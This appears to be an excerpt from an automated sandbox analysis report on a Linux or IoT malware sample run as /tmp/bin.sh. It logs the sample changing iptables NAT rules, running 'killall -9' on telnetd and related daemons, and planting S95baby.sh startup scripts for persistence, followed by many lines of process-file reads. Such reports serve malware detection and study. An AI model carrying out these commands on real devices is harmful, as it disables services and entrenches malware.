                            Source: /bin/sh (PID: 7439) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT
                            Sample reads /proc/mounts (often used for finding a writable filesystem)
                            Source: /tmp/bin.sh (PID: 6792) File: /proc/6792/mounts
                            Terminates several processes with shell command 'killall'
                            Source: /bin/sh (PID: 6797) Killall command executed: killall -9 telnetd utelnetd scfgmgr
                            Source: /tmp/bin.sh (PID: 6792) File written: /usr/networks
                            Source: /tmp/bin.sh (PID: 6792) Shell script file created: /etc/rcS.d/S95baby.sh
                            Source: /tmp/bin.sh (PID: 6792) Shell script file created: /etc/init.d/S95baby.sh
                            Source: /tmp/bin.sh (PID: 6819) Reads from proc file: /proc/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/230/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/231/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/232/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/233/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/234/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/3512/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/359/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/1452/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/3632/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/3518/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/10/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/1339/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/11/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/12/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/13/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/14/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/15/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/16/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/17/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/18/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/19/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/483/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/3527/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/3527/cmdline
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/1/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/2/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/3525/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/3/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/1346/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/3524/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/3524/cmdline
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/4/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/3523/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/5/stat
                            Source: /usr/bin/killall (PID: 6797) File opened: /proc/7/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/8/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/9/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/20/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/21/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/22/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/23/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/24/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/25/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/28/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/29/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1363/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3541/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3541/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1362/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/496/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/496/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/30/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/31/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/31/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/1119/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3310/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3431/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/3431/cmdline
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/263/stat
                            Source: /usr/bin/killall (PID: 6797)File opened: /proc/264/stat